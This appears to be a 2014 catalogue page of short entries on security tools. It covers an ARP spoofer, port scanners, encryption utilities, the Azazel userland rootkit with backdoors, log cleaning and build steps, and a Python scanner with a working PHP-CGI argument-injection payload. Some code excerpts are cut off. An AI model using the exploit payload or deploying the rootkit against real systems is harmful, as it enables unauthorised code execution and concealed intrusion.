Linux
Climber
11 March, 2014 - 04:53 — cisc0ninjaClimber is an automated auditing tool to check UNIX/Linux systems misconfigurations which may allow local privilege escalation.
Dependencies
python >= 2.7
python-crypto
python-mako
python-paramiko
Note
Climber needs Exscript, a Python module and a template processor for automating network connections over protocols such as Telnet or SSH.
https://github.com/knipknap/exscript
This module is already included in Climber sources.
NetCommander
11 March, 2014 - 04:51 — cisc0ninjaNetCommander 1.3 - An easy to use arp spoofing tool.
Copyleft Simone Margaritelli
http://www.evilsocket.net
http://www.backbox.org
Options:
-h, --help show this help message and exit
-I IFACE, --iface=IFACE
Network interface to use if different from the default
one.
-N NETWORK, --network=NETWORK
Network to work on.
-G GATEWAY, --gateway=GATEWAY
Gateway to use.
-K, --kill Kill targets connections instead of forwarding them.
-D DELAY, --delay=DELAY
Delay in seconds between one arp packet and another,
default is 5.
-A, --all Keep spoofing and spoof all connected and later
connected interfaces.
pyCryptocat
11 March, 2014 - 04:50 — cisc0ninjapyCryptocat - A Cryptocat standalone python client
Authors and contributors
Simone Margaritelli (evilsocket)
Raffaele Forte
Cryptocat is free software that aims to provide an open, accessible Instant Messaging environment that encrypts your conversations and works right in your browser.
pyCryptocat is a Cryptocat standalone chat client written in Python, using python-webkit package to serve Cryptocat JS and HTML files.
Cryptocat provides multi-user (and private) instant messaging inside chatrooms. It uses the OTR protocol for encrypted two-party chat and the (upcoming) mpOTR protocol for encrypted multi-party chat.
The goal is to provide the easiest, most accessible way to chat while maintaining your privacy online.
Azazel
11 March, 2014 - 04:45 — cisc0ninjaAzazel is a userland rootkit written in C based off of the original LD_PRELOAD technique from Jynx rootkit. It is more robust and has additional features, and focuses heavily around anti-debugging and anti-detection. Features include log cleaning, pcap subversion, and more.
Features:
Anti-debugging
Avoids unhide, lsof, ps, ldd detection
Hides files and directories
Hides remote connections
Hides processes
Hides logins
PCAP hooks avoid local sniffing
Two accept backdoors with full PTY shells.
Crypthook encrypted accept() backdoor
Plaintext accept() backdoor
PAM backdoor for local privesc and remote entry
Log cleanup for utmp/wtmp entries based on pty
Uses xor to obfuscate static strings
Installation:
Clone the sources
localhost:~ $ git clone https://github.com/chokepoint/azazel.git
Build the rootkit
localhost:~ $ make
Hooking Methods
Azazel utilizes the same hooking methods as Jynx/Jynx2. You can hook individual programs at the time of execution by taking advantage of the LD_PRELOAD variable. By default, Azazel installs itself as libselinux.so into /lib. An entry is then added to /etc/ld.so.preload in order to hook system wide dynamically compiled programs.
Example runtime hooking of bash.
localhost:~ $ LD_PRELOAD=/lib/libselinux.so bash -l
Instead of dlsym'ing direct libc functions by globally declaring old_syscall, Azazel has a new structure in azazel.h named syscall_list.
This allows all of the required functions to be linked upon initiation of the library.
Syscall function names are XORed by config.py and written to const.h
Original libc functions can be accessed by using the preprocessor definitions also in const.h
Each definition has a prefix of SYS_name_of_function_in_caps.
For example to call libc's version of fopen, you would use syscalls[SYS_FOPEN].syscall_func();
typedef struct struct_syscalls {
PHP-CGI Remote Code Execution Scanner
11 March, 2014 - 04:43 — cisc0ninjaPHP-CGI Remote Code Execution Scanner - This small python script scans for a number of variations on the PHP-CGI remote code execution vulnerability, includes "apache magica" and plesk paths, along with other misconfigurations.
Authored by infodox
# Written for /r/netsec
# test for the apache-magicka exploit bug. Added plesk and "how not to configure your box" paths.
# infodox - insecurety.net - 2013
# Twitter: @info_dox
# Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
# released under WTFPL
import requests
import sys
def scan(target):
paths = ['/index.php', '/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi', '/cgi-bin/php4', '/phppath/php', '/phppath/php5', '/local-bin/php', '/local-bin/php5']
for path in paths:
probe(target, path)
def probe(target, path):
print "[*] Testing Path: %s" %(path)
trigger = path + "/?"
trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%"
trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F"
trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F"
trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75"
trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6"
trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64"
trigger += "+%64%69%73%61%62%6C%65%5F%66%75%"
trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2"
trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65"
trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+"
trigger += "%61%75%74%6F%5F%70%72%65%70%65%6"
trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%"
trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E"
url = target + trigger
php = """<?php echo "Content-Type:text/html\r\n\r\n"; echo md5('1337x'); ?>"""
try:
haxor = requests.post(url, php)
if "44e902a5aa760d79b76e070fa6725386" in haxor.text:
print "Exploitable!"
except Exception:
print "Err, Someshit broke"
def main(args):
if len(sys.argv) !=2:
Ipdecap
11 March, 2014 - 04:35 — cisc0ninjaIpdecap can decapsulate traffic encapsulated within GRE, IPIP, 6in4, ESP (ipsec) protocols, and can also remove IEEE 802.1Q (virtual lan) header.
It reads packets from an pcap file, removes the encapsulation protocol, and writes them to another pcap file.
Goals are:
Extract encapsulated tcp flow to analyze them with conventional tcp tools (tcptrace, tcpflow, …)
Reduce pcap files size by removing encapsulation protocol
Ipdecap was first written to analyze a strange tcp behavior encapsulated by ESP, without intervention on vpn endpoints.
Installation:
Dependances
Openssl
Libpcap
Compilation
wget https://github.com/lpefferkorn/ipdecap/archive/v0.7.tar.gz
tar xvzf v0.7.tar.gz
cd ipdecap-0.7
sh autogen.sh
./configure
make
make install
Use
Command line:
A source pcap file
An output pcap file
A configuration file to decrypt ESP packets
Maybe a bpf filter to limit packets to process.
Ipdecap 0.5, decapsulate GRE, IPIP, 6in4, ESP packets, remove 802.1Q header - Loic Pefferkorn
Supported encapsulation protocols
GRE
IPIP
6in4 (IPv6 encapsulated within IPv4)
ESP (ipsec, tunnel mode)
ESP algorithms
(crypt) des-cbc 3des-cbc aes128-cbc aes128-ctr null_enc
(auth) hmac_md5-96 hmac_sha1-96 aes_xcbc_mac-96 null_auth any96 any128 any160 any192 any256 any384 any512
Usage
ipdecap [-v] [-l] [-V] -i input.cap -o output.cap [-c esp.conf] [-f ]
Options:
-c, --conf configuration file for ESP parameters (IP addresses, algorithms, ... (see man ipdecap)
-h, --help this help message
-i, --input pcap file to process
-o, --output pcap file with decapsulated data
-f, --filter only process packets matching the bpf filter
-l, --list list availables ESP encryption and authentication algorithms
-V, --version print version
-v, --verbose verbose
Netscan Port Scanner
11 March, 2014 - 04:29 — cisc0ninjaNetscan Port Scanner 1.0
Authored by Domenico Pinto
Netscan is a TCP and UDP SYN scanner that can also leverage Tor.
gcc -lpthread netscan.c -o netscan
Tcp/Udp/Tor port scanner with: synpacket, connect TCP/UDP and socks5(tor connection)
*/
#include <math.h>
#include <time.h>
#include <stdio.h>
#include <errno.h>
#include <netdb.h>
#include <fcntl.h>
#include <ctype.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <net/if.h>
#include <pthread.h>
#include <termios.h>
#include <sys/mman.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>
#include <netinet/in_systm.h>
#define LPORT 1
#define HPORT 65535
#define TCPSZ sizeof(struct iphdr)+sizeof(struct tcphdr)
#define PSESZ sizeof(struct pseudohdr)+sizeof(struct tcphdr)
#define TORPORT 9050
#define TORCTRL 9051
#define LOCALHOST "127.0.0.1"
#define SOCKS5 "\x05\x01\x00"
#define UDP_RESEND 6
#define UDP_PACKET 4096
/* global var */
static int verbose;
static int syn;
static int conn;
static int tor;
static int normal;
static int progress;
static int rangeport;
static int singleport;
static int specificport;
static int udp;
static int webserver;
static int banserv;
unsigned int delay=50000, timeout=1, timeout_s=1, timeout_u=200;
unsigned short min, max, port;
unsigned short index_p=, index_o=, index_c=, index_f=;
unsigned short ports[HPORT], open_p[HPORT], closed_p[HPORT], filtred_p[HPORT];
char *hostname, *eth0, *ipsource;
typedef enum { false, true } bool;
/* struct tcp syn packet */
struct pseudohdr {
in_addr_t src;
in_addr_t dst;
char padd;
char proto;
unsigned short len;
};
Nsdtool Netgear Switch Scanner
11 March, 2014 - 04:26 — cisc0ninjaNsdtool is a toolset of scripts used to detect Netgear switches in local networks.
The tool contains some extra features like bruteforce and setting a new password.
Netgear has its own protocol called NSDP (Netgear Switch Discovery Protocol), which is implemented to support security tests on the commandline.
It is not being bound to the delivered tools by Netgear.
CodeCrypt
11 March, 2014 - 04:21 — cisc0ninjaThe post-quantum cryptography tool.
This is a GnuPG-like unix program for encryption and signing that uses only quantum-computer-resistant algorithms:
McEliece cryptosystem (compact quasi-dyadic variant) for encryption
Hash-based Merkle tree algorithm (FMTSeq variant) for digital signatures
Why this?
Go read http://pqcrypto.org/
Links
infopage: http://e-x-a.org/codecrypt/
package downloads: http://e-x-a.org/codecrypt/files/
Documentation
There is a complete, UNIXy manual page supplied with the package. You can view it online here: http://e-x-a.org/codecrypt/ccr.1.html
Everything is meant to work mostly like GnuPG, but with some good simplicity margin. Let's play with random data!
ccr -g help
ccr -g fmtseq128-sha --name "John Doe" # your signature key
ccr -g mceqd128 --name "John Doe" # your encryption key
ccr -K #watch the generated keys
ccr -k
ccr -p -a -o my_pubkeys.asc -F Doe # export your pubkeys for friends
#see what people sent us
ccr -ina < friends_pubkeys.asc
#import Frank's key and rename it
ccr -ia -R friends_pubkeys.asc --name "Friendly Frank"
#send a nice message to Frank (you can also specify him by @12345 keyid)
ccr -se -r Frank < Document.doc > Message_to_frank.ccr
#receive a reply
ccr -dv -o Decrypted_verified_reply.doc <Reply_from_frank.ccr
#rename other's keys
ccr -m Frank -N "Unfriendly Frank"
#and delete pukeys of everyone who's Unfriendly
ccr -x Unfri
#create hashfile from a large file
ccr -sS hashfile.ccr < big_data.iso
#verify the hashfile
ccr -vS hashfile.ccr < the_same_big_data.iso
Option reference
For completeness I add listing of all options here (also available from ccr --help)
Usage: ./ccr [options]
Common options:
-h, --help display this help
-V, --version display version information
-T, --test perform (probably nonexistent) testing/debugging stuff
Global options:
SystemSearcher
3 February, 2014 - 15:29 — cisc0ninjaSystemSearcher is a Linux security scanner written in Perl. It scans single hosts or subnets for anonymous FTP servers, TFTP servers, SMTP servers which allow relaying, SSH servers, Telnet servers, NFS servers with exported directories, mail servers, Web servers (HTTP/HTTPS), well- known trojan ports, and exploitable CGIs. You can also scan a list of specific servers and specific ports. It uses non-blocking socket communication with a 3-second socket timeout. It can also scan for proxy servers which are open to the world (on port 80,8080,1080, or 3128), and SMB servers or Windows boxes sharing directories.
